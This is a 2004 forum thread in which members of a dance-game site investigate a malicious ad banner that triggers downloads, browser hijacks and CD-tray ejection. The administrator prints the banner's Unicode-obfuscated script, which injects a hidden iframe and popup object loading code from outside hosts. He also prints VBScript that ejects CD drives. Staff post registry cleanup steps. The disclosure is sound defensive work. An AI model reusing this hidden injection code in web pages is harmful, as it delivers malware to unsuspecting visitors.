| View previous topic :: View next topic |
| Author |
Message |
Rychan
Contributor
Joined: 01 Jul 2003
Location: Castle Rock, CO |
40.  Posted: Thu Feb 26, 2004 3:37 pm Post subject: |
 |
|
| J Dogg wrote: | | Rychan wrote: | I'm starting to get File Download popup with each page I go to.
htm.htm is the file name
www.achtungachtung.com is where it's from.
This is really really annoying.... |
It's most likely caused by some adware, spyware, or virus from your computer. As of now, we don't have any popups, file downloads, or anything on DDR Freak ads. |
It is accompanying that My Sound Works banner.
_________________
|
|
| Back to top |
|
 |
J Dogg
Administrator
Joined: 16 Jan 2002
Location: Sunnyvale, CA |
| 41. Posted: Thu Feb 26, 2004 4:08 pm Post subject: |
|
|
I have never seen a My Sound Works banner.. can you link to it please?
Edit: I found it, and it's pretty ridiculous. It has vbscript that attempts to open your cd tray, and some other stuff hidden in unicode. Check this out:
http://209.50.251.151/mysoundworks/msw-h.html
| Code: |
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0061\u0063\u0068\u0074\u0075\u006e\u0067\u0061\u0063\u0068\u0074\u0075\u006e\u0067\u002e\u0063\u006f\u006d\u002f\u0030\u0030\u0032\u0031\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
<a HREF="http://www.mysoundworks.com/landing1.html" TARGET="_blank"><img BORDER="0" WIDTH="468" HEIGHT="60" ALT="Click here to visit our sponsor"
SRC="http://209.50.251.151/mysoundworks/mysoundworks-468x60.gif"></a>
<script type="text/javascript">document.write('\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u000d\u000a\u0076\u0061\u0072\u0020\u006f\u0050\u006f\u0070\u0075\u0070\u0020\u003d\u0020\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u003b\u000d\u000a\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0068\u006f\u0077\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u000d\u000a\u007b\u000d\u000a\u0009\u006f\u0050\u006f\u0070\u0075\u0070\u002e\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0069\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c\u0020\u003d\u0020\u0022\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u002e\u0070\u0061\u0073\u0073\u0074\u0068\u0069\u0073\u006f\u006e\u002e\u0063\u006f\u006d\u002f\u0076\u0075\u0030\u0038\u0033\u0030\u0030\u0033\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u002e\u0063\u0067\u0069\u003f\u0068\u006f\u006d\u0065\u0070\u0061\u0067\u0065\u0031\u003e\u0022\u003b\u000d\u000a\u0009\u006f\u0050\u006f\u0070\u0075\u0070\u002e\u0073\u0068\u006f\u0077\u0028\u0030\u002c\u0030\u002c\u0031\u002c\u0031\u002c\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u0029\u003b\u000d\u000a\u007d\u000d\u000a\u0073\u0068\u006f\u0077\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e')</script>
<script language=javascript>
var expdate = new Date((new Date()).getTime() + 72000000);
if (document.cookie.indexOf("del20hr") == -1) {
document.cookie="del20hr=general; expires=" + expdate.toGMTString() + "; path=/;";
}
</script>
<script language=javascript>
var expdate = new Date((new Date()).getTime() + 72000000);
if (document.cookie.indexOf("hp20hr") == -1) {
document.cookie="hp20hr=general; expires=" + expdate.toGMTString() + "; path=/;";
}
</script>
|
The top code opens an iframe:
| Code: |
<iframe src="http://www.achtungachtung.com/0021/index.php" width=1 height=1></iframe>
|
The bottom code is vbscript that attempts to open your CD tray:
| Code: |
<script LANGUAGE="VBScript">
<!--
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
-->
</script>
|
I have notified the ad people already to take down this ad. In the meantime, IguanaGrrl knows how to change your configuration so this doesn't happen anymore--I'll ask her to post the fix here later.
_________________
|
|
| Back to top |
|
|
VxJasonxV
Maniac Member
Joined: 08 Feb 2002
Location: Castle Rock, CO |
| 42. Posted: Thu Feb 26, 2004 5:36 pm Post subject: |
|
|
That is downright horrible...
I wouldn't be suprised if their e-mail server is destroyed by days end...
_________________
|
|
| Back to top |
|
|
Rychan
Contributor
Joined: 01 Jul 2003
Location: Castle Rock, CO |
| 43. Posted: Thu Feb 26, 2004 11:44 pm Post subject: |
|
|
| J Dogg wrote: | I have never seen a My Sound Works banner.. can you link to it please?
I have notified the ad people already to take down this ad. In the meantime, IguanaGrrl knows how to change your configuration so this doesn't happen anymore--I'll ask her to post the fix here later. |
Sorry I was away from my computer the rest of the day. I saw the banner again this evening but it didn't open that save file window again.
[edit] spoke too soon, even did it when I came to edit this post.
_________________
|
|
| Back to top |
|
|
IguanaGrrl
Staff Member
Joined: 17 Jan 2002
Location: Sacramento, CA |
| 44. Posted: Fri Feb 27, 2004 6:13 am Post subject: |
|
|
| J Dogg wrote: |
I have notified the ad people already to take down this ad. In the meantime, IguanaGrrl knows how to change your configuration so this doesn't happen anymore--I'll ask her to post the fix here later. |
I don't know how to make it not happen anymore, but I know how to fix the obnoxious regkeys it leaves. 
Step #1:
Download a program called HijackThis
Step #2: Open the program.
Step #3: Press the Scan button.
The program will scan your computer for regkeys that might be dangerous. It is imperative that you only remove exact matches, because other items might cause issues with other programs in your computer. This is not something you want to play with unless you have instruction or a STRONG working knowledge of your computer.
Step #4: Close all other windows
Step #5: Look through the list for the following items:
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = »www.default-homepage-network.com/start
O2 - BHO: (no name) - {029CA12C-89C1-46a7-A3C7-82F2F98635CB} - (no file)
O4 - HKCU\..\Run: [msmc] C:\WINDOWS\System32\mscpbo.exe
If you find one of these items, select the checkbox next to the item.
Step #7: Press Fix Checked and then close the program.
You should be obnoxious issue free at this point. If you have further problems with this one, let me know so I can further research. The above fixed my issues on multiple computers.
_________________
|
|
| Back to top |
|
|
Cutriss
Staff Member
Joined: 24 Jan 2002
|
| 45. Posted: Fri Feb 27, 2004 7:39 am Post subject: |
|
|
My god...Horizontal scrolling from hell... 
_________________
Sentient Mode is capable... |
|
| Back to top |
|
|
VxJasonxV
Maniac Member
Joined: 08 Feb 2002
Location: Castle Rock, CO |
| 46. Posted: Fri Feb 27, 2004 12:38 pm Post subject: |
|
|
Blame JDogg  .
_________________
|
|
| Back to top |
|
|
J Dogg
Administrator
Joined: 16 Jan 2002
Location: Sunnyvale, CA |
| 47. Posted: Fri Feb 27, 2004 2:45 pm Post subject: |
|
|
| Cutriss wrote: | | My god...Horizontal scrolling from hell... |
Funny.. on IE I don't get any scrolling
_________________
|
|
| Back to top |
|
|
sfetaz
Vivid Member
Joined: 02 May 2002
|
| 48. Posted: Fri Feb 27, 2004 3:14 pm Post subject: |
|
|
TYPINGTHISSOITDOESNOTAUTOLINK***www.achtungachtung.com***
That site contains trojan horses on all its pages that automatically get on your PC when visiting DDRFreak's forum. Lucklily my norton antivirus picks it up each time, but I am 100% certain it is from DDRFreak forums. The virus is called Download.Trojan.
It also changes your homepage default and ejects your CDROM drives. |
|
| Back to top |
|
|
VxJasonxV
Maniac Member
Joined: 08 Feb 2002
Location: Castle Rock, CO |
| 49. Posted: Fri Feb 27, 2004 5:43 pm Post subject: |
|
|
Hi,
We've been talking about this throughout the whole page.
There are even fixes posted just 4 posts up from yours.
Thanks.
_________________
|
|
| Back to top |
|
|
sfetaz
Vivid Member
Joined: 02 May 2002
|
| 50. Posted: Sat Feb 28, 2004 5:06 am Post subject: |
|
|
| I did not see mention of getting a virus from the site so I felt it necessary to post. According to norton the virus attempts to download other virii to your computer, which is a serious matter. |
|
| Back to top |
|
|
VxJasonxV
Maniac Member
Joined: 08 Feb 2002
Location: Castle Rock, CO |
| 51. Posted: Sat Feb 28, 2004 8:23 am Post subject: |
|
|
My bad. However, the same thing was reported last page, and the discussion has carried through to this page.
_________________
|
|
| Back to top |
|
|
KillerJello
Trick Member
Joined: 21 Jan 2004
Location: Flint, MI\Beulah, MI |
| 52. Posted: Sat Feb 28, 2004 3:49 pm Post subject: |
|
|
| There have been several browser hijack attempts coming from this site over the past couple days... |
|
| Back to top |
|
|
once was dcb
Trick Member
Joined: 24 Jan 2002
|
| 53. Posted: Sun Feb 29, 2004 12:43 am Post subject: |
|
|
| I made that thread about the ad/spyware problem. Well that same pop up that was popping up now pops up EVERYTIME I close my browoser window. At first, it popped up only when I closed DDRFreak Forums, but now it is EVERYTIME. Adaware and SpyBot don't pick this up, so I don't know what the hell it is. The pop up comes from "belgiandip.com" |
|
| Back to top |
|
|
IguanaGrrl
Staff Member
Joined: 17 Jan 2002
Location: Sacramento, CA |
| 54. Posted: Sun Feb 29, 2004 8:38 am Post subject: |
|
|
| Randy Slake wrote: | | I made that thread about the ad/spyware problem. Well that same pop up that was popping up now pops up EVERYTIME I close my browoser window. At first, it popped up only when I closed DDRFreak Forums, but now it is EVERYTIME. Adaware and SpyBot don't pick this up, so I don't know what the hell it is. The pop up comes from "belgiandip.com" |
Seconded. I'm not sure where this is coming from and I've updated my Adaware and Spybot as much as possible and can't find a thing on it. I can't even find anything on the internet about how to fix this one, so if someone comes across a cure, let me know.
_________________
|
|
| Back to top |
|
|
Edible Bondage Tape
Trick Member
Joined: 26 Jan 2002
Location: Kerri |
| 55. Posted: Sun Feb 29, 2004 12:08 pm Post subject: |
|
|
and hijack this didnt find any susspisous things that could be atributed to it
_________________
|
|
| Back to top |
|
|
once was dcb
Trick Member
Joined: 24 Jan 2002
|
| 56. Posted: Sun Feb 29, 2004 1:01 pm Post subject: |
|
|
| Ths fucking pop up got worse. Now it pops up with the belgiandip window, along with another window containing an actual advertisement. I looked at the URL of the new pop up that comes up. and it's fucking GATOR. Gator is pure evil. |
|
| Back to top |
|
|
Rychan
Contributor
Joined: 01 Jul 2003
Location: Castle Rock, CO |
| 57. Posted: Mon Mar 01, 2004 10:52 am Post subject: |
|
|
I noticed scrolling on a thead that didn't have a chain of text or anything to cause such. I thought it was nothing until I was in the Console Games forum and it did the same thing.
There's a search ad banner that is causing the About DDR etc part of the page to scoot over past the Logout. I have a screenshot since the search changes the text each time. First was Omni Casino, second was some hotels thing.
This was the one when I posted this in the first place
_________________
|
|
| Back to top |
|
|
LouieT
Trick Member
Joined: 06 Nov 2002
Location: Visalia, Central CA |
| 58. Posted: Mon Mar 01, 2004 4:21 pm Post subject: |
|
|
Ugh, another pop-up installer. 
Click for screenshot It's something about Flashtalk. |
|
| Back to top |
|
|
J Dogg
Administrator
Joined: 16 Jan 2002
Location: Sunnyvale, CA |
| 59. Posted: Mon Mar 01, 2004 5:47 pm Post subject: |
|
|
The my sound works banner is gone... but now we have to take care of the other annoying ones. Ugh, I don't know what the problem is with these ad people. I'm very sorry... I'm talking to the ad people about it.
The problem is that I'm at the very end of the ad chain (me -> host -> ad people -> advertisers), so I apologize if it takes a few days for these things to be taken care of.
_________________
|
|
| Back to top |
|
|
|
Forums FAQ
Search
Memberlist
Usergroups
Register
Profile
Login to check your private messages
Login
